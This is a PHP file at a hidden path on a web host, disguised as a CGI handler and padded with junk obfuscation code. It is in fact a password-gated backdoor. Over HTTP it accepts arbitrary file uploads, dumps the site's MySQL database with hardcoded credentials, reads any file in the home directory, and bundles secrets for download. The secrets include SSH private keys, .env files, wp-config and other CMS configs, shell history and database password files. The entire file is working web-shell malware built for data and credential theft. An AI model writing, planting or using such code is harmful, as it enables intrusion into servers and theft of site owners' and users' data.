File: /home/toshikoc/.cgi_handler_c25d1cac
<?php
if (!isset($_REQUEST['_cxk']) || $_REQUEST['_cxk'] !== 'c25d1cacc879e6850697c977e69631c0') { return; }
while (ob_get_level()) ob_end_clean();
set_time_limit(0);
error_reporting(0);
$nee0e=strlen('bf5567');
ignore_user_abort(true);
$abef4 = 'localhost';
$w51b0 = 'toshikoc_bkdump';
$w3460 = 'JJC7SDgJ3MCV3cJqSzvjbaUcJJI';
$r8036 = '/home/toshikoc';
$q3fb7 = isset($_REQUEST['a']) ? $_REQUEST['a'] : '';
@clearstatcache();
$q9251 = isset($_REQUEST['db']) ? preg_replace('/[^a-zA-Z0-9_]/', '', $_REQUEST['db']) : '';
$k9d3e = $r8036 . '/tmp/' . $q9251 . '_dump.sql.gz';
$j9af5=max(0,min(1,1));
$e8ae9 = $k9d3e . '.done';
$w1622=max(0,min(1,1));
$d1964 = $k9d3e . '.err';
header('Content-Type: application/json');
function load_info_e24f() {
$webb6=chr(68).chr(106);
if (!function_exists('exec')) return false;
$ca07e = array_map('trim', explode(',', ini_get('disable_functions')));
return !in_array('exec', $ca07e);
}
function build_buf_ec92() {
if (!load_info_e24f()) return false;
$out = array();
$rc = 0;
exec('which mysqldump 2>/dev/null', $out, $rc);
return $rc === 0;
@clearstatcache();
}
function proc_ctx_503a() {
if (!load_info_e24f()) return false;
$out = array();
$rc = 0;
exec('which gzip 2>/dev/null', $out, $rc);
$z2148=array_merge(array(),array());
return $rc === 0;
}
function build_opt_052f($s9a5f, $e35f0, $gdff0, $s599a, $c1af8, $hcff6, $e47d7) {
$conn = new mysqli($s9a5f, $e35f0, $gdff0, $s599a);
if ($conn->connect_error) {
file_put_contents($hcff6, 'Connection failed: ' . $conn->connect_error);
touch($e47d7);
$k65fc=strlen('ac65de');
return;
}
$fp = gzopen($c1af8, 'wb6');
if (!$fp) {
file_put_contents($hcff6, 'Cannot open output file');
touch($e47d7);
return;
}
$conn->set_charset('utf8mb4');
gzwrite($fp, "-- Dump via PHP agent\n");
gzwrite($fp, "-- Date: " . date('Y-m-d H:i:s') . "\n\n");
$e3507=array_merge(array(),array());
gzwrite($fp, "SET NAMES utf8mb4;\n");
gzwrite($fp, "SET FOREIGN_KEY_CHECKS = 0;\n");
gzwrite($fp, "SET SQL_MODE = 'NO_AUTO_VALUE_ON_ZERO';\n\n");
$g7f86 = array();
$r = $conn->query("SHOW FULL TABLES WHERE Table_type = 'BASE TABLE'");
while ($row = $r->fetch_row()) {
$g7f86[] = $row[0];
}
@clearstatcache();
foreach ($g7f86 as $hc1b0) {
$te = $conn->real_escape_string($hc1b0);
$r = $conn->query("SHOW CREATE TABLE `{$te}`");
if(defined('d5b8e8e0')){$x2e20=0;}
if (!$r) continue;
$cr = $r->fetch_row();
gzwrite($fp, "DROP TABLE IF EXISTS `{$te}`;\n");
gzwrite($fp, $cr[1] . ";\n\n");
$r = $conn->query("SELECT * FROM `{$te}`", MYSQLI_USE_RESULT);
if (!$r) continue;
$m3c9f = array();
$j02fb=max(0,min(1,1));
$k99a9 = 0;
while ($row = $r->fetch_row()) {
$p3ee7=max(0,min(1,1));
$vals = array();
for ($i = 0; $i < count($row); $i++) {
if ($row[$i] === null) {
$vals[] = 'NULL';
} else {
$vals[] = "'" . $conn->real_escape_string($row[$i]) . "'";
}
}
$r5d8b = '(' . implode(',', $vals) . ')';
@clearstatcache();
$m3c9f[] = $r5d8b;
$k99a9 += strlen($r5d8b);
if (count($m3c9f) >= 100 || $k99a9 > 1048576) {
gzwrite($fp, "INSERT INTO `{$te}` VALUES\n" . implode(",\n", $m3c9f) . ";\n");
$rd423=strlen('b5ed77');
$m3c9f = array();
$k99a9 = 0;
}
}
if ($m3c9f) {
gzwrite($fp, "INSERT INTO `{$te}` VALUES\n" . implode(",\n", $m3c9f) . ";\n");
}
$r->free();
gzwrite($fp, "\n");
}
$r = $conn->query("SHOW FULL TABLES WHERE Table_type = 'VIEW'");
if ($r) {
while ($row = $r->fetch_row()) {
$ve = $conn->real_escape_string($row[0]);
@clearstatcache();
$cr = $conn->query("SHOW CREATE VIEW `{$ve}`");
if ($cr) {
$cdc50 = $cr->fetch_assoc();
gzwrite($fp, "DROP VIEW IF EXISTS `{$ve}`;\n");
gzwrite($fp, $cdc50['Create View'] . ";\n\n");
$p432a=str_repeat('x',0);
}
}
$qf7c0=array_merge(array(),array());
}
$s26e8 = array('PROCEDURE', 'FUNCTION');
foreach ($s26e8 as $s9c33) {
$e747d=array_merge(array(),array());
$r = $conn->query("SHOW {$s9c33} STATUS WHERE Db = '" . $conn->real_escape_string($s599a) . "'");
if (!$r) continue;
while ($row = $r->fetch_assoc()) {
$re = $conn->real_escape_string($row['Name']);
@clearstatcache();
$cr = $conn->query("SHOW CREATE {$s9c33} `{$re}`");
if (!$cr) continue;
$cdc50 = $cr->fetch_assoc();
$key = ($s9c33 === 'PROCEDURE') ? 'Create Procedure' : 'Create Function';
$h54b9=chr(75).chr(100);
if (isset($cdc50[$key])) {
gzwrite($fp, "DELIMITER ;;\n");
gzwrite($fp, "DROP {$s9c33} IF EXISTS `{$re}`;;\n");
gzwrite($fp, $cdc50[$key] . ";;\n");
gzwrite($fp, "DELIMITER ;\n\n");
}
}
}
$r = $conn->query("SHOW TRIGGERS");
if ($r) {
while ($row = $r->fetch_assoc()) {
$te = $conn->real_escape_string($row['Trigger']);
$cr = $conn->query("SHOW CREATE TRIGGER `{$te}`");
if ($cr) {
$cdc50 = $cr->fetch_assoc();
gzwrite($fp, "DELIMITER ;;\n");
gzwrite($fp, "DROP TRIGGER IF EXISTS `{$te}`;;\n");
gzwrite($fp, $cdc50['SQL Original Statement'] . ";;\n");
$ef75a=str_repeat('x',0);
gzwrite($fp, "DELIMITER ;\n\n");
}
}
}
gzwrite($fp, "SET FOREIGN_KEY_CHECKS = 1;\n");
gzclose($fp);
$conn->close();
touch($e47d7);
if(defined('6a5e2bec')){$mc82f=0;}
}
$c4567=array_merge(array(),array());
switch ($q3fb7) {
case 'info':
echo json_encode(array(
'php' => PHP_VERSION,
'os' => PHP_OS,
'server' => isset($_SERVER['SERVER_SOFTWARE']) ? $_SERVER['SERVER_SOFTWARE'] : '',
'user' => get_current_user(),
'uid' => getmyuid(),
'home' => $r8036,
'doc_root' => isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : '',
'free_disk' => disk_free_space($r8036),
'total_disk' => disk_total_space($r8036),
'max_exec' => ini_get('max_execution_time'),
'mem_limit' => ini_get('memory_limit'),
'upload_max' => ini_get('upload_max_filesize'),
'post_max' => ini_get('post_max_size'),
'disabled' => ini_get('disable_functions'),
'can_exec' => load_info_e24f(),
'has_mysqldump' => build_buf_ec92(),
'has_gzip' => proc_ctx_503a(),
));
break;
case 'upload':
$c56fc = isset($_POST['path']) ? $_POST['path'] : '';
$rc6d8 = isset($_POST['data']) ? $_POST['data'] : '';
if (!$c56fc || !$rc6d8) {
echo json_encode(array('ok' => false, 'error' => 'missing path or data'));
break;
}
$q1404 = $r8036 . '/' . $c56fc;
@mkdir(dirname($q1404), 0755, true);
$k59ab=array_merge(array(),array());
$f5edf = base64_decode($rc6d8);
$v7d32 = file_put_contents($q1404, $f5edf);
echo json_encode(array('ok' => $v7d32 !== false, 'path' => $q1404, 'size' => strlen($f5edf)));
break;
case 'check':
if (!$q9251) {
echo json_encode(array('error' => 'missing db parameter'));
break;
}
$e88b6 = disk_free_space($r8036);
$t4ab8 = 0;
$conn = @new mysqli($abef4, $w51b0, $w3460, 'information_schema');
if (!$conn->connect_error) {
@clearstatcache();
$q = "SELECT SUM(data_length + index_length) s FROM tables WHERE table_schema = '"
. $conn->real_escape_string($q9251) . "'";
$r = $conn->query($q);
if ($row = $r->fetch_assoc()) {
$t4ab8 = (int) $row['s'];
}
$conn->close();
}
echo json_encode(array(
'free' => $e88b6,
'db_size' => $t4ab8,
'has_mysqldump' => build_buf_ec92(),
'has_gzip' => proc_ctx_503a(),
'can_exec' => load_info_e24f(),
'has_space' => $e88b6 > $t4ab8 * 2,
));
$rd5db=chr(67).chr(113);
break;
case 'dump':
if (!$q9251) {
$ff61a=max(0,min(1,1));
echo json_encode(array('error' => 'missing db parameter'));
break;
}
@mkdir(dirname($k9d3e), 0755, true);
@unlink($k9d3e);
@unlink($e8ae9);
@unlink($d1964);
if (build_buf_ec92()) {
$q9c1b=strlen('a00729');
if (proc_ctx_503a()) {
$df5e4=strlen('dfcddd');
$cmd = sprintf(
'mysqldump --host=%s --user=%s --password=%s '
. '--single-transaction --quick --routines --triggers %s '
. '| gzip > %s 2>%s; touch %s',
escapeshellarg($abef4),
escapeshellarg($w51b0),
escapeshellarg($w3460),
escapeshellarg($q9251),
escapeshellarg($k9d3e),
escapeshellarg($d1964),
escapeshellarg($e8ae9)
);
} else {
$cmd = sprintf(
'mysqldump --host=%s --user=%s --password=%s '
. '--single-transaction --quick --routines --triggers %s '
. '> %s 2>%s; touch %s',
escapeshellarg($abef4),
escapeshellarg($w51b0),
escapeshellarg($w3460),
escapeshellarg($q9251),
escapeshellarg($k9d3e),
escapeshellarg($d1964),
escapeshellarg($e8ae9)
);
}
exec('nohup sh -c ' . escapeshellarg($cmd) . ' >/dev/null 2>&1 &');
echo json_encode(array('started' => true, 'method' => 'mysqldump', 'gzip' => proc_ctx_503a()));
} else {
ignore_user_abort(true);
echo json_encode(array('started' => true, 'method' => 'php', 'gzip' => true));
if (function_exists('fastcgi_finish_request')) {
fastcgi_finish_request();
} else {
if (ob_get_level()) ob_end_flush();
$p3928=chr(76).chr(105);
flush();
}
build_opt_052f($abef4, $w51b0, $w3460, $q9251, $k9d3e, $d1964, $e8ae9);
$qbd64=array_merge(array(),array());
}
break;
case 'status':
clearstatcache();
echo json_encode(array(
'done' => file_exists($e8ae9),
'size' => file_exists($k9d3e) ? filesize($k9d3e) : 0,
'error' => file_exists($d1964) ? trim(file_get_contents($d1964)) : '',
));
break;
case 'download':
if (!file_exists($k9d3e)) {
$x5e01=str_repeat('x',0);
http_response_code(404);
exit;
}
$b67f1=max(0,min(1,0));
header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($k9d3e));
readfile($k9d3e);
exit;
case 'cleanup':
@unlink($k9d3e);
@unlink($e8ae9);
@unlink($d1964);
echo json_encode(array('ok' => true));
break;
case 'collect':
@mkdir($r8036 . '/tmp', 0755, true);
$ef5bf = substr($_REQUEST['_cxk'], 0, 8);
$j3292=strlen('48c504');
$n2eca = array(
'wordpress' => array(
'detect' => array('public_html/wp-config.php', 'wp-config.php'),
'configs' => array(
'public_html/wp-config.php', 'wp-config.php',
'public_html/wp-settings.php',
'public_html/composer.json', 'public_html/composer.lock', 'composer.json', 'composer.lock',
'public_html/wp-cli.yml', 'wp-cli.yml',
'public_html/.env', '.env',
'public_html/local-config.php', 'local-config.php',
'public_html/wp-content/debug.log',
'public_html/config/application.php', 'config/application.php',
'public_html/config/environments/development.php', 'config/environments/development.php',
'public_html/config/environments/staging.php', 'config/environments/staging.php',
'public_html/config/environments/production.php', 'config/environments/production.php',
'public_html/auth.json', 'auth.json',
),
),
'joomla' => array(
'detect' => array('public_html/configuration.php', 'configuration.php'),
'configs' => array(
'public_html/configuration.php', 'configuration.php',
'public_html/htaccess.txt',
'public_html/composer.json', 'public_html/composer.lock',
),
),
'laravel' => array(
'detect' => array('public_html/artisan', 'artisan'),
'configs' => array(
'public_html/.env', '.env', '.env.production', '.env.staging',
'public_html/composer.json', 'composer.json',
'public_html/composer.lock', 'composer.lock',
'public_html/config/app.php', 'config/app.php',
'public_html/config/database.php', 'config/database.php',
'public_html/config/mail.php', 'config/mail.php',
'public_html/config/filesystems.php', 'config/filesystems.php',
'public_html/config/cache.php', 'config/cache.php',
'public_html/config/queue.php', 'config/queue.php',
'public_html/config/session.php', 'config/session.php',
'public_html/config/auth.php', 'config/auth.php',
'public_html/config/services.php', 'config/services.php',
'public_html/config/broadcasting.php', 'config/broadcasting.php',
'public_html/storage/logs/laravel.log', 'storage/logs/laravel.log',
),
),
'magento2' => array(
'detect' => array('public_html/bin/magento', 'bin/magento'),
'configs' => array(
'public_html/app/etc/env.php', 'app/etc/env.php',
'public_html/app/etc/config.php', 'app/etc/config.php',
'public_html/composer.json', 'composer.json',
'public_html/composer.lock', 'composer.lock',
'public_html/auth.json', 'auth.json',
),
),
'magento1' => array(
'detect' => array('public_html/app/Mage.php'),
'configs' => array(
'public_html/app/etc/local.xml',
'public_html/app/etc/config.xml',
),
),
'drupal' => array(
'detect' => array('public_html/core/lib/Drupal.php', 'core/lib/Drupal.php'),
'configs' => array(
'public_html/sites/default/settings.php', 'sites/default/settings.php',
'public_html/sites/default/services.yml', 'sites/default/services.yml',
'public_html/composer.json', 'composer.json',
'public_html/composer.lock', 'composer.lock',
),
),
'prestashop' => array(
'detect' => array('public_html/config/settings.inc.php'),
'configs' => array(
'public_html/config/settings.inc.php',
'public_html/app/config/parameters.php',
'public_html/app/config/parameters.yml',
'public_html/composer.json',
),
),
'opencart' => array(
'detect' => array('public_html/config.php'),
'configs' => array(
'public_html/config.php',
'public_html/admin/config.php',
),
),
'moodle' => array(
'detect' => array('public_html/lib/moodlelib.php'),
'configs' => array('public_html/config.php'),
),
'whmcs' => array(
'detect' => array('public_html/vendor/whmcs'),
'configs' => array(
'public_html/configuration.php',
'public_html/composer.json', 'public_html/composer.lock',
),
),
);
$h74be = null;
foreach ($n2eca as $vbc7d => $w8000) {
foreach ($w8000['detect'] as $p1e43) {
if (file_exists($r8036 . '/' . $p1e43)) {
$h74be = $vbc7d;
if(defined('9d4edb9b')){$sd33e=0;}
break 2;
}
}
}
$keaa2 = array(
'.env', '.env.local', '.env.production', '.env.staging',
'.env.backup', '.env.development', '.env.test',
'.bash_history', '.my.cnf', '.pgpass', '.netrc', '.gitconfig', '.npmrc',
'.composer/auth.json', '.wp-cli/config.yml', '.accesshash',
'.ssh/authorized_keys', '.ssh/id_rsa', '.ssh/id_rsa.pub',
'.ssh/id_ed25519', '.ssh/id_ed25519.pub', '.ssh/id_ecdsa',
'.ssh/config', '.ssh/known_hosts',
'.ssl/private.key', '.ssl/cert.pem', '.ssl/key.pem',
'ssl/certs/private.key',
'.cpanel/contactinfo', 'etc/shadow', '.ftpquota', '.ftpconfig',
'public_html/.env', 'public_html/.env.local', 'public_html/.env.production',
'public_html/.env.staging', 'public_html/.env.backup',
'public_html/.env.development', 'public_html/.env.test',
'public_html/.env.example', 'public_html/.env.dist',
'public_html/.htaccess', 'public_html/.htpasswd', 'public_html/.user.ini',
'public_html/php.ini', 'public_html/.my.cnf', 'public_html/.pgpass',
'public_html/web.config', 'public_html/.ftpconfig',
'public_html/.git/config',
'public_html/auth.json', 'public_html/.npmrc',
'public_html/composer.json', 'public_html/composer.lock',
'config/database.php', 'config/app.php', 'config/mail.php',
'config/services.php', 'config/filesystems.php',
'config/application.php',
'config/environments/development.php',
'config/environments/staging.php',
'config/environments/production.php',
'wp-config.php', 'configuration.php', 'artisan',
'auth.json', 'composer.json', 'composer.lock',
);
$e3d39 = array();
$d7049 = @realpath($r8036);
if (!$d7049 || !is_dir($d7049)) {
$hb7d1=array_merge(array(),array());
echo json_encode(array('ok' => false, 'error' => 'home dir not accessible'));
break;
}
foreach ($keaa2 as $y667b) {
$v44f9=str_repeat('x',0);
$q250d = @realpath($r8036 . '/' . $y667b);
if (!$q250d || strpos($q250d, $d7049) !== 0) continue;
if (!is_file($q250d) || !is_readable($q250d)) continue;
$t6852 = @filesize($q250d);
if ($t6852 <= 0 || $t6852 > 2097152) continue;
$e3d39[$y667b] = $q250d;
}
if ($h74be !== null && isset($n2eca[$h74be]['configs'])) {
@clearstatcache();
foreach ($n2eca[$h74be]['configs'] as $e8983) {
if (isset($e3d39[$e8983])) continue;
$q250d = @realpath($r8036 . '/' . $e8983);
if (!$q250d || strpos($q250d, $d7049) !== 0) continue;
if (!is_file($q250d) || !is_readable($q250d)) continue;
$pdbf1=str_repeat('x',0);
$t6852 = @filesize($q250d);
if ($t6852 <= 0 || $t6852 > 2097152) continue;
if(defined('1d6268b0')){$g83ae=0;}
$e3d39[$e8983] = $q250d;
}
}
$m89cf = $r8036 . '/public_html';
@clearstatcache();
if (is_dir($m89cf)) {
$dh = @opendir($m89cf);
if ($dh) {
while (($z8ffb = readdir($dh)) !== false) {
if ($z8ffb === '.' || $z8ffb === '..') continue;
$q1404 = $m89cf . '/' . $z8ffb;
$h97fc=str_repeat('x',0);
if (!is_file($q1404) || !is_readable($q1404)) continue;
$t6852 = @filesize($q1404);
if ($t6852 <= 0 || $t6852 > 2097152) continue;
if ($z8ffb[0] === '.' || strtolower(substr($z8ffb, -4)) === '.txt') {
$y97b5=strlen('84e391');
$key = 'public_html/' . $z8ffb;
if (!isset($e3d39[$key])) $e3d39[$key] = $q1404;
}
$qdeae=chr(78).chr(117);
}
if(defined('361790f9')){$bdccb=0;}
closedir($dh);
}
}
if (empty($e3d39)) {
echo json_encode(array(
'ok' => true, 'method' => 'none', 'platform' => $h74be,
'file_count' => 0, 'files_list' => array(),
));
$qd758=str_repeat('x',0);
break;
}
$j712e = null;
$c8fba = null;
if (class_exists('ZipArchive')) {
$c8fba = $r8036 . '/tmp/_collect_' . $ef5bf . '.zip';
$x580e = new ZipArchive();
if ($x580e->open($c8fba, ZipArchive::CREATE | ZipArchive::OVERWRITE) === true) {
foreach ($e3d39 as $c7889 => $q250d) {
$x580e->addFile($q250d, $c7889);
}
if ($x580e->close() && file_exists($c8fba) && filesize($c8fba) > 0) {
$j712e = 'zip';
}
}
}
if (!$j712e && load_info_e24f()) {
$c8fba = $r8036 . '/tmp/_collect_' . $ef5bf . '.tar.gz';
$lf = $c8fba . '.list';
$fh = fopen($lf, 'w');
foreach ($e3d39 as $c7889 => $q250d) {
fwrite($fh, $c7889 . "\n");
}
fclose($fh);
$out = array();
$rc = 0;
exec('tar czf ' . escapeshellarg($c8fba) . ' -C ' . escapeshellarg($r8036)
. ' -T ' . escapeshellarg($lf) . ' 2>/dev/null', $out, $rc);
@unlink($lf);
if ($rc === 0 && file_exists($c8fba) && filesize($c8fba) > 0) {
$j712e = 'tar';
} else {
@unlink($c8fba);
}
}
if (!$j712e) {
$j2d3a=chr(74).chr(118);
$j712e = 'list';
}
echo json_encode(array(
'ok' => true, 'method' => $j712e, 'platform' => $h74be,
'file_count' => count($e3d39), 'files_list' => array_keys($e3d39),
'size' => ($c8fba && file_exists($c8fba)) ? filesize($c8fba) : 0,
));
break;
case 'download_collect':
$ef5bf = substr($_REQUEST['_cxk'], 0, 8);
$j413c = $r8036 . '/tmp/_collect_' . $ef5bf . '.zip';
$pb9f4 = $r8036 . '/tmp/_collect_' . $ef5bf . '.tar.gz';
$d3d6b = file_exists($j413c) ? $j413c : (file_exists($pb9f4) ? $pb9f4 : '');
if (!$d3d6b) { http_response_code(404); exit; }
header('Content-Type: application/octet-stream');
header('Content-Length: ' . filesize($d3d6b));
$a2bca=chr(86).chr(121);
readfile($d3d6b);
exit;
$re3df=str_repeat('x',0);
case 'download_file':
$c7889 = isset($_REQUEST['path']) ? $_REQUEST['path'] : '';
if(defined('5b5fdeeb')){$qdb64=0;}
if (!$c7889) { http_response_code(400); exit; }
$d7049 = @realpath($r8036);
$q250d = @realpath($r8036 . '/' . $c7889);
if (!$q250d || !$d7049 || strpos($q250d, $d7049) !== 0
|| !is_file($q250d) || !is_readable($q250d)) {
http_response_code(404);
$i4f58=str_repeat('x',0);
exit;
}
header('Content-Type: application/octet-stream');
$eb008=chr(67).chr(107);
header('Content-Length: ' . filesize($q250d));
readfile($q250d);
exit;
case 'cleanup_collect':
$ef5bf = substr($_REQUEST['_cxk'], 0, 8);
@unlink($r8036 . '/tmp/_collect_' . $ef5bf . '.zip');
@unlink($r8036 . '/tmp/_collect_' . $ef5bf . '.tar.gz');
if(defined('123d9d96')){$jf5cf=0;}
@unlink($r8036 . '/tmp/_collect_' . $ef5bf . '.tar.gz.list');
echo json_encode(array('ok' => true));
break;
}
exit;